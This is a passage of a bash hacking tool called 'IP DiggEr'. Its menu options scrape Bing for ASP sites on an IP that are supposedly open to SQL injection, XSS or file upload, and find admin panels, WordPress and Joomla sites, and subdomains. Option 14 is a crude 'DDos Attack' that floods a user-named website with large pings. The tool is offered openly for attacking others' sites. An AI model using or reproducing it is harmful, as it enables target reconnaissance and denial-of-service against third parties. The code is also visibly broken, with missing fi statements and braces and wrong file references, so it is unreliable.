  585. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  586. echo " <^> ---------------------------------- <^> "
  587. echo -e " \e[1;34m <^> --------- Advance ASP SQL Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
  588. echo
  589. echo -e " \e[1;35m This Tool will scan for the SQLI Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
  590. echo
  591. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  592. echo -e " \e[1;36m<^> Finding SQLI Websites B| <^> \e[0m"
  593. #<!--- Blank Input -----------------!>
  594. if [ -z $ipaddress ]; then
  595. echo "-_- ----------------------------- -_- "
  596. echo -e "\e[1;31m Blank Input \e[0m"
  597. echo "-_- ----------------------------- -_- "
  598. exit
  599. #<!--- SQLI Website Finder ---!>
  600. F_ARG=$ipaddress
  601. page=0
  602. last_page_check=
  603. how_many=1
  604. single_page=
  605. domain=
  606. function usage()
  607. echo ""
  608. echo "<^> ---------------------------------- <^> "
  609. echo " Tool Name :- IP DiggEr ( SQLI Website Finder )"
  610. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  611. echo "<^> ---------------------------------- <^> "
  612. # check for inputs
  613. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  614. Usage;
  615. exit 1
  616. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  617. then
  618. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  619. exit 1
  620. echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
  621. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  622. url="http://www.bing.com/search?q=ip:$ipaddress+.asp?id=&qs=n&pq=ip:$ipaddress+.asp?id=&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  623. wget -q -O sql_website_finder.php "$url"
  624. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' sql_website_finder.php`
  625. #no results
  626. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' sql_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  627. #single page result
  628. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' sql_website_finder.php`
  629. cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" sql_website_finder.php | cut -d '"' -f 2 >> aspsql_vulnerable_websites.txt
  630. rm -f sql_website_finder.php
  631. let page=$page+1
  632. done
  633. cat aspsql_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> sqli_websites.txt
  634. number=0
  635. for line in `cat sqli_websites.txt`
  636. varfor=`echo "$line" | egrep "$ipaddress"`
  637. let number=$number+1
  638. if [ -z $varfor ]
  639. then
  640. echo "$number" >> many.txt
  641. done
  642. count=0
  643. for txtvar in `cat many.txt`
  644. let del=$txtvar-$count
  645. hey=$del
  646. sed -i "$hey"d sqli_websites.txt
  647. let count=$count+1
  648. done
  649. #sort SQL websites
  650. found_N=`wc -l aspsql_vulnerable_websites.txt | sed 's/aspsql_vulnerable_websites.txt//'`
  651. echo
  652. echo -e "\e[1;37mFound $found_N SQLI Websites ( ASP SERVER ) =)) \e[0m"
  653. rm -f many.txt;
  654. rm -f sqli_websites.txt
  655. echo
  656. echo -e "\e[1;34m <^> Searched websites have been saved in aspsql_vulnerable_websites.txt in the Desktop =))
  657. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  658. read -p "Press Enter to Cont"
  659. if [ "$mychoice" = "8" ]; then
  660. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  661. echo " Tool Name :- IP DiggEr ( Advance ASP XSS Vulnerable Website Finder )"
  662. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  663. echo " <^> ---------------------------------- <^> "
  664. echo -e " \e[1;31m <^> --------- Advance ASP XSS Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
  665. echo
  666. echo -e " \e[1;35m This Tool will scan for the XSS Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
  667. echo
  668. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  669. echo -e " \e[1;36m<^> Finding XSS Websites B| <^> \e[0m"
  670. #<!--- Blank Input -----------------!>
  671. if [ -z $ipaddress ]; then
  672. echo "-_- ----------------------------- -_- "
  673. echo -e "\e[1;31m Blank Input \e[0m"
  674. echo "-_- ----------------------------- -_- "
  675. exit
  676. #<!--- SQLI Website Finder ---!>
  677. F_ARG=$ipaddress
  678. page=0
  679. last_page_check=
  680. how_many=1
  681. single_page=
  682. domain=
  683. function usage()
  684. echo ""
  685. echo "<^> ---------------------------------- <^> "
  686. echo " Tool Name :- IP DiggEr ( XSS Vulnerable Website Finder )"
  687. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  688. echo "<^> ---------------------------------- <^> "
  689. # check for inputs
  690. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  691. Usage;
  692. exit 1
  693. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  694. then
  695. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  696. exit 1
  697. echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
  698. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  699. url="http://www.bing.com/search?q=ip:$ipaddress+search.asp?&qs=n&pq=ip:$ipaddress+search.asp?&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  700. wget -q -O xss_website_finder.php "$url"
  701. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' xss_website_finder.php`
  702. #no results
  703. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' xss_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  704. #single page result
  705. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' xss_website_finder.php`
  706. cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" xss_website_finder.php | cut -d '"' -f 2 >> aspxss_vulnerable_websites.txt
  707. rm -f xss_website_finder.php
  708. let page=$page+1
  709. done
  710. cat aspxss_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> xss_websites.txt
  711. number=0
  712. for line in `cat sqli_websites.txt`
  713. varfor=`echo "$line" | egrep "$ipaddress"`
  714. let number=$number+1
  715. if [ -z $varfor ]
  716. then
  717. echo "$number" >> many.txt
  718. done
  719. count=0
  720. for txtvar in `cat many.txt`
  721. let del=$txtvar-$count
  722. hey=$del
  723. sed -i "$hey"d xss_websites.txt
  724. let count=$count+1
  725. done
  726. #sort SQL websites
  727. found_N=`wc -l aspxss_vulnerable_websites.txt | sed 's/aspxss_vulnerable_websites.txt//'`
  728. echo
  729. echo -e "\e[1;37mFound $found_N ASP XSS Websites =)) \e[0m"
  730. rm -f many.txt;
  731. rm -f xss_websites.txt
  732. echo
  733. echo -e "\e[1;34m <^> Searched websites have been saved in aspxss_vulnerable_websites.txt in the Desktop =))
  734. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  735. echo
  736. echo "<^> --------------------------------------------------- <^> "
  737. read -p "Press Enter to Cont"
  738. #<!--- SQLI Website Finder ---!>
  739. if [ "$mychoice" = "9" ]; then
  740. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  741. echo " Tool Name :- IP DiggEr ( Advance ASP Admin Panel Website Finder )"
  742. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  743. echo " <^> ---------------------------------- <^> "
  744. echo -e " \e[1;31m <^> --------- Advance ASP Admin Panel Finder ( IP Address ) ---------- <^> \e[0m "
  745. echo
  746. echo -e " \e[1;35m This Tool will scan for the Admin Panels on the IP Address that You will Provide it =)) \e[0m "
  747. echo
  748. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  749. echo -e " \e[1;36m<^> Finding Admin Panels B| <^> \e[0m"
  750. #<!--- Blank Input -----------------!>
  751. if [ -z $ipaddress ]; then
  752. echo "-_- ----------------------------- -_- "
  753. echo -e "\e[1;31m Blank Input \e[0m"
  754. echo "-_- ----------------------------- -_- "
  755. exit
  756. #<!--- RFI Website Finder ---!>
  757. F_ARG=$ipaddress
  758. page=0
  759. last_page_check=
  760. how_many=1
  761. single_page=
  762. domain=
  763. function usage()
  764. echo ""
  765. echo "<^> ---------------------------------- <^> "
  766. echo " Tool Name :- IP DiggEr ( Admin PAnel Finder )"
  767. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  768. echo "<^> ---------------------------------- <^> "
  769. # check for inputs
  770. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  771. Usage;
  772. exit 1
  773. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  774. then
  775. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  776. exit 1
  777. echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
  778. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  779. url="http://www.bing.com/search?q=ip:$ipaddress+admin+login&qs=n&pq=ip:$ipaddress+admin+login&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  780. wget -q -O ap_website_finder.php "$url"
  781. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' ap_website_finder.php`
  782. #no results
  783. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' ap_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  784. #single page result
  785. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' ap_website_finder.php`
  786. cat "ap_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" ap_website_finder.php | cut -d '"' -f 2 >> asp_ap_vulnerable_websites.txt
  787. rm -f ap_website_finder.php
  788. let page=$page+1
  789. done
  790. cat asp_ap_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> ap_websites.txt
  791. number=0
  792. for line in `cat ap_websites.txt`
  793. varfor=`echo "$line" | egrep "$ipaddress"`
  794. let number=$number+1
  795. if [ -z $varfor ]
  796. then
  797. echo "$number" >> many.txt
  798. done
  799. count=0
  800. for txtvar in `cat many.txt`
  801. let del=$txtvar-$count
  802. hey=$del
  803. sed -i "$hey"d ap_websites.txt
  804. let count=$count+1
  805. done
  806. #sort SQL websites
  807. found_N=`wc -l asp_ap_vulnerable_websites.txt | sed 's/asp_ap_vulnerable_websites.txt//'`
  808. echo
  809. echo -e "\e[1;37mFound $found_N Admin Panels =)) \e[0m"
  810. rm -f many.txt;
  811. rm -f ap_websites.txt
  812. echo
  813. echo -e "\e[1;34m <^> Searched websites have been saved in asp_ap_vulnerable_websites.txt in the Desktop =))
  814. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  815. echo
  816. echo "<^> --------------------------------------------------- <^> "
  817. read -p "Press Enter to Cont"
  818. #<!--- ASP ADMIN PANEL FINDER ---!>
  819. #<!---- Upload Vulnerability ----!>
  820. if [ "$mychoice" = "10" ]; then
  821. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  822. echo " Tool Name :- IP DiggEr ( Advance ASP Upload Vulnerability Finder )"
  823. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  824. echo " <^> ---------------------------------- <^> "
  825. echo -e " \e[1;31m <^> --------- Advance ASP Upload Vulnerability Finder ( IP Address ) ---------- <^> \e[0m "
  826. echo
  827. echo -e " \e[1;35m This Tool will scan for the File Uploading Vulnerable Websites on the IP Address that You will Provide it =)) \e[0m "
  828. echo
  829. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  830. echo -e " \e[1;36m<^> Finding File Uploading Vulnerable Websites B| <^> \e[0m"
  831. #<!--- Blank Input -----------------!>
  832. if [ -z $ipaddress ]; then
  833. echo "-_- ----------------------------- -_- "
  834. echo -e "\e[1;31m Blank Input \e[0m"
  835. echo "-_- ----------------------------- -_- "
  836. exit
  837. #<!--- UP Website Finder ---!>
  838. F_ARG=$ipaddress
  839. page=0
  840. last_page_check=
  841. how_many=1
  842. single_page=
  843. domain=
  844. function usage()
  845. echo ""
  846. echo "<^> ---------------------------------- <^> "
  847. echo " Tool Name :- IP DiggEr ( File Uploading )"
  848. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  849. echo "<^> ---------------------------------- <^> "
  850. # check for inputs
  851. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  852. Usage;
  853. exit 1
  854. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  855. then
  856. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  857. exit 1
  858. echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
  859. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  860. url="http://www.bing.com/search?q=ip:$ipaddress+upload&qs=n&pq=ip:$ipaddress+upload&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  861. wget -q -O up_website_finder.php "$url"
  862. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' up_website_finder.php`
  863. #no results
  864. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' up_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  865. #single page result
  866. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' up_website_finder.php`
  867. cat "up_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" up_website_finder.php | cut -d '"' -f 2 >> asp_up_vulnerable_websites.txt
  868. rm -f up_website_finder.php
  869. let page=$page+1
  870. done
  871. cat aspup_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> up_websites.txt
  872. number=0
  873. for line in `cat up_websites.txt`
  874. varfor=`echo "$line" | egrep "$ipaddress"`
  875. let number=$number+1
  876. if [ -z $varfor ]
  877. then
  878. echo "$number" >> many.txt
  879. done
  880. count=0
  881. for txtvar in `cat many.txt`
  882. let del=$txtvar-$count
  883. hey=$del
  884. sed -i "$hey"d up_websites.txt
  885. let count=$count+1
  886. done
  887. #sort SQL websites
  888. found_N=`wc -l aspup_vulnerable_websites.txt | sed 's/aspup_vulnerable_websites.txt//'`
  889. echo
  890. echo -e "\e[1;37mFound $found_N File Upload Vulnerable Websites =)) \e[0m"
  891. rm -f many.txt;
  892. rm -f up_websites.txt
  893. echo
  894. echo -e "\e[1;34m <^> Searched websites have been saved in aspup_vulnerable_websites.txt in the Desktop =))
  895. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  896. echo
  897. echo "<^> --------------------------------------------------- <^> "
  898. read -p "Press Enter to Cont"
  899. #<!--- ASP XSS FINDER ---!>
  900. #sort Wordpress sites finder
  901. if [ "$mychoice" = "11" ]; then
  902. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  903. echo " Tool Name :- IP DiggEr ( Wordpress Website Finder )"
  904. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  905. echo " <^> ---------------------------------- <^> "
  906. echo -e " \e[1;31m <^> --------- Wordpress Site Finder ( IP Address ) ---------- <^> \e[0m "
  907. echo
  908. echo -e " \e[1;35m This Tool will scan for the Wordpress websites on the IP Address that You will Provide it =)) \e[0m "
  909. echo
  910. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  911. echo -e " \e[1;36m<^> Finding Wordpress Websites B| <^> \e[0m"
  912. #<!--- Blank Input -----------------!>
  913. if [ -z $ipaddress ]; then
  914. echo "-_- ----------------------------- -_- "
  915. echo -e "\e[1;31m Blank Input \e[0m"
  916. echo "-_- ----------------------------- -_- "
  917. exit
  918. #<!--- SQLI Website Finder ---!>
  919. F_ARG=$ipaddress
  920. page=0
  921. last_page_check=
  922. how_many=1
  923. single_page=
  924. domain=
  925. function usage()
  926. echo ""
  927. echo "<^> ---------------------------------- <^> "
  928. echo " Tool Name :- IP DiggEr ( Wordpress Website Finder )"
  929. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  930. echo "<^> ---------------------------------- <^> "
  931. # check for inputs
  932. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  933. Usage;
  934. exit 1
  935. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  936. then
  937. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  938. exit 1
  939. echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
  940. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  941. url="http://www.bing.com/search?q=ip:$ipaddress+wordpress&qs=n&pq=ip:$ipaddress+wordpress&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  942. wget -q -O xss_website_finder.php "$url"
  943. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' xss_website_finder.php`
  944. #no results
  945. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' xss_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  946. #single page result
  947. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' xss_website_finder.php`
  948. cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" xss_website_finder.php | cut -d '"' -f 2 >> wordpress_websites.txt
  949. rm -f xss_website_finder.php
  950. let page=$page+1
  951. done
  952. cat wordpress_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> xss_websites.txt
  953. number=0
  954. for line in `cat sqli_websites.txt`
  955. varfor=`echo "$line" | egrep "$ipaddress"`
  956. let number=$number+1
  957. if [ -z $varfor ]
  958. then
  959. echo "$number" >> many.txt
  960. done
  961. count=0
  962. for txtvar in `cat many.txt`
  963. let del=$txtvar-$count
  964. hey=$del
  965. sed -i "$hey"d xss_websites.txt
  966. let count=$count+1
  967. done
  968. #sort SQL websites
  969. found_N=`wc -l wordpress_websites.txt | sed 's/wordpress_websites.txt//'`
  970. echo
  971. echo -e "\e[1;37mFound $found_N Wordpress Websites =)) \e[0m"
  972. rm -f many.txt;
  973. rm -f xss_websites.txt
  974. echo
  975. echo -e "\e[1;34m <^> Searched websites have been saved in wordpress_websites.txt in the Desktop =))
  976. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  977. echo
  978. echo "<^> --------------------------------------------------- <^> "
  979. read -p "Press Enter to Cont"
  980. #Joomla Site finder
  981. if [ "$mychoice" = "12" ]; then
  982. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  983. echo " Tool Name :- IP DiggEr ( Joomla Website Finder )"
  984. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  985. echo " <^> ---------------------------------- <^> "
  986. echo -e " \e[1;31m <^> --------- Joomla Site Finder ( IP Address ) ---------- <^> \e[0m "
  987. echo
  988. echo -e " \e[1;35m This Tool will scan for the Joomla websites on the IP Address that You will Provide it =)) \e[0m "
  989. echo
  990. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  991. echo -e " \e[1;36m<^> Finding Joomla Websites B| <^> \e[0m"
  992. #<!--- Blank Input -----------------!>
  993. if [ -z $ipaddress ]; then
  994. echo "-_- ----------------------------- -_- "
  995. echo -e "\e[1;31m Blank Input \e[0m"
  996. echo "-_- ----------------------------- -_- "
  997. exit
  998. #<!--- SQLI Website Finder ---!>
  999. F_ARG=$ipaddress
  1000. page=0
  1001. last_page_check=
  1002. how_many=1
  1003. single_page=
  1004. domain=
  1005. function usage()
  1006. echo ""
  1007. echo "<^> ---------------------------------- <^> "
  1008. echo " Tool Name :- IP DiggEr ( Wordpress Website Finder )"
  1009. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  1010. echo "<^> ---------------------------------- <^> "
  1011. # check for inputs
  1012. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  1013. Usage;
  1014. exit 1
  1015. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  1016. then
  1017. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  1018. exit 1
  1019. echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
  1020. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  1021. url="http://www.bing.com/search?q=ip:$ipaddress+joomla&qs=n&pq=ip:$ipaddress+joomla&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  1022. wget -q -O xss_website_finder.php "$url"
  1023. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' xss_website_finder.php`
  1024. #no results
  1025. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' xss_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  1026. #single page result
  1027. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' xss_website_finder.php`
  1028. cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" xss_website_finder.php | cut -d '"' -f 2 >> joomla_websites.txt
  1029. rm -f xss_website_finder.php
  1030. let page=$page+1
  1031. done
  1032. cat joomla_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> xss_websites.txt
  1033. number=0
  1034. for line in `cat sqli_websites.txt`
  1035. varfor=`echo "$line" | egrep "$ipaddress"`
  1036. let number=$number+1
  1037. if [ -z $varfor ]
  1038. then
  1039. echo "$number" >> many.txt
  1040. done
  1041. count=0
  1042. for txtvar in `cat many.txt`
  1043. let del=$txtvar-$count
  1044. hey=$del
  1045. sed -i "$hey"d xss_websites.txt
  1046. let count=$count+1
  1047. done
  1048. #sort SQL websites
  1049. found_N=`wc -l joomla_websites.txt | sed 's/joomla_websites.txt//'`
  1050. echo
  1051. echo -e "\e[1;37mFound $found_N Joomla Websites =)) \e[0m"
  1052. rm -f many.txt;
  1053. rm -f xss_websites.txt
  1054. echo
  1055. echo -e "\e[1;34m <^> Searched websites have been saved in joomla_websites.txt in the Desktop =))
  1056. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  1057. echo
  1058. echo "<^> --------------------------------------------------- <^> "
  1059. echo
  1060. read -p "Press Enter to Cont"
  1061. # Web Terminator
  1062. if [ "$mychoice" = "14" ]; then
  1063. echo -e " \e[1;31m <^> ---------------------------------- <^> "
  1064. echo " Tool Name :- IP DiggEr ( Web Terminator aka DDos Attack! )"
  1065. echo " Coded by :- Un_N0n "
  1066. echo " <^> ---------------------------------- <^> "
  1067. echo -e "\e[1;34m Want to take the Website down =)) Then it is the best t0ol for ew xD \e[0m "
  1068. echo
  1069. read -p "[+] Enter the website you want to DDos :- " domain
  1070. # No input
  1071. if [ -z $domain ]; then
  1072. echo "-_- ----------------------------- -_- "
  1073. echo -e "\e[1;31m Blank Input \e[0m"
  1074. echo "-_- ----------------------------- -_- "
  1075. exit
  1076. echo
  1077. echo -e "\e[1;31m DDosing on $website started "
  1078. echo -e "\e[1;34m For stopping the DDosing press CTRL + C "
  1079. res=`ping $domain -s 5000`
  1080. res2=`ping $domain -s 5000`
  1081. res3=`ping $domain -s 5000`
  1082. res4=`ping $domain -s 5000`
  1083. res5=`ping $domain -s 5000`
  1084. res6=`ping $domain -s 5000`
  1085. res7=`ping $domain -s 5000`
  1086. res8=`ping $domain -s 5000`
  1087. res9=`ping $domain -s 5000`
  1088. res10=`ping $domain -s 5000`
  1089. # IP resolver
  1090. if [ "$mychoice" = "15" ]; then
  1091. echo -e " \e[1;32m ---------------------------------- "
  1092. echo -e " Tool Name :- IP Resolver"
  1093. echo -e " Coded by :- Un_N0n "
  1094. echo -e " ---------------------------------- \e[0m "
  1095. echo
  1096. read -p "[+] Enter the website :- " domain
  1097. # No input
  1098. if [ -z $domain ]; then
  1099. echo "-_- ----------------------------- -_- "
  1100. echo -e "\e[1;31m Blank Input \e[0m"
  1101. echo "-_- ----------------------------- -_- "
  1102. exit
  1103. ping=`ping $domain -c 1 | awk '{print $5}' | grep -v 'bytes'`
  1104. echo
  1105. echo -e "\e[1;31m The IP of $domain is :- " $ping
  1106. echo
  1107. read -p "Press Enter to Cont"
  1108. #==================================================================================================
  1109. if [ "$mychoice" = "13" ]; then
  1110. echo -e " \e[1;31m !--------- Sub Domain Scanner -> Un_N0n , Coded by - Beni_Vanda ( IrIsT ) ---------!\e[0m"
  1111. echo
  1112. read -p "Enter The Website *(www.website_name.com)* : " domain
  1113. echo
  1114. echo -e "\e[1;32m[*] Weapons Ready.\e[0m"
  1115. # No input
  1116. if [ -z $domain ]; then
  1117. echo "-_- ----------------------------- -_- "
  1118. echo -e "\e[1;31m Blank Input \e[0m"
  1119. echo "-_- ----------------------------- -_- "
  1120. exit
  1121. #<!--- SUB DOMAIN SCANNER ---!>
  1122. #==================================================================================================
  1123. F_ARG=$domain
  1124. page=0
  1125. last_page_check=
  1126. how_many=1
  1127. single_page=
  1128. domain=
  1129. function Usage()
  1130. echo ""
  1131. echo "# ******************************************************************************************#"
  1132. echo "# Name : SubDomain-Scanner.sh [Domain] *#"
  1133. echo "# Help : -h && --help : Show This Menu *#"
  1134. echo "# by : Beni_Vanda ( IrIsT ) #"
  1135. echo "# ******************************************************************************************#"
  1136. echo ""
  1137. # check for arguments
  1138. if [ -z "$F_ARG" ] || [ "$F_ARG" == "-h" ] || [ "$F_ARG" == "--help" ]; then
  1139. Usage;
  1140. exit 1
  1141. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  1142. then
  1143. echo -e "\e[1;31mplease insert doamin with out http:// \e[0m"
  1144. exit 1
  1145. if [ `echo "$F_ARG" | egrep "www."` ];
  1146. then
  1147. domain=`echo "$F_ARG" |sed '/www./s///g' `
  1148. echo -e "\e[1;31m[*] Going To Use Bing Servers ...\e[0m"
  1149. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  1150. #http://www.bing.com/search?q=%27yahoo.com%27&qs=n&pq=%27yahoo.com%27&sc=0-0&sp=-1&sk=&first=80&FORM=PERE"
  1151. url="http://www.bing.com/search?q=%27$domain%27&qs=n&pq=%27$domain%27&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  1152. # url="http://www.bing.com/search?q=ip%3A$IP&go=&qs=n&first=${page}0&FORM=PERE"
  1153. # out=`mktemp -p /tmp -t IrIsT_Sub_Domain_Bing.tmp.XXXXXX`
  1154. wget -q -O sub_domain_bing.php "$url"
  1155. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' sub_domain_bing.php`
  1156. # if no results are found, how_many is empty and the loop will exit
  1157. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' sub_domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`
  1158. # check for a single page of results
  1159. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' sub_domain_bing.php `
  1160. cat "sub_domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" sub_domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
  1161. rm -f sub_domain_bing.php
  1162. let page=$page+1
  1163. done
  1164. cat alldomain_bing.txt | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq >> subdomain.txt
  1165. number=0
  1166. for line in `cat subdomain.txt`
  1167. varfor=`echo "$line" | egrep "$domain"`
  1168. let number=$number+1
  1169. if [ -z $varfor ]
  1170. then
  1171. echo "$number" >> many.txt
  1172. fi
  1173. done
  1174. count=0
  1175. for txtvar in `cat many.txt`
  1176. let del=$txtvar-$count
  1177. hey=$del
  1178. sed -i "$hey"d subdomain.txt
  1179. let count=$count+1
  1180. done
  1181. #sort subdomain | uniq
  1182. found_N=`wc -l subdomain.txt | sed 's/subdomain.txt//'`
  1183. echo
  1184. echo -e "\e[1;34mFound $found_N SubDomains :) \e[0m"
  1185. rm -f alldomain_bing.txt;
  1186. rm -f many.txt;
  1187. mv subdomain.txt -t /root/Desktop
  1188. echo
  1189. echo -e "\e[1;32m[+] Results has been stored in file named subdomain.txt on Desktop, change its name to prevent overwrite. [+]\e[0m"
  1190. echo
  1191. echo "##############################################################"
  1192. echo
  1193. read -p "Press Enter to Cont"
  1194. }
  1195. #==================================================================================================
  1196. #<!--- SUB DOMAIN SCANNER ENDS ---!>
  1197. if [ "$mychoice" = "88" ]; then
  1198. {
  1199. echo "-------------------------------------------------------------------------------------------------------------------------------"
  1200. echo " | "
  1201. echo " |Gurender Singh A.K.A Un_N0n "
  1202. echo " |=-=-=-=-=-- :- "
  1203. echo " | "
  1204. echo -e " |\e[1;31m[1] - Admin of Team indihex , ICP.\e[0m "
  1205. echo -e " |\e[1;31m[2] - For Contact Search On Facebook - Un_N0n.\e[0m"
  1206. echo -e " |\e[1;31m[3] - ---------------------------------------------------------.\e[0m "
  1207. echo -e " |\e[1;31m[4] - Bug Remover , Tester for IP-Digger. \e[0m "
  1208. echo -e " |\e[1;31m[3] - Enjoy !.\e[0m"
  1209. echo " | "
  1210. echo " |[+] Peace Out. "
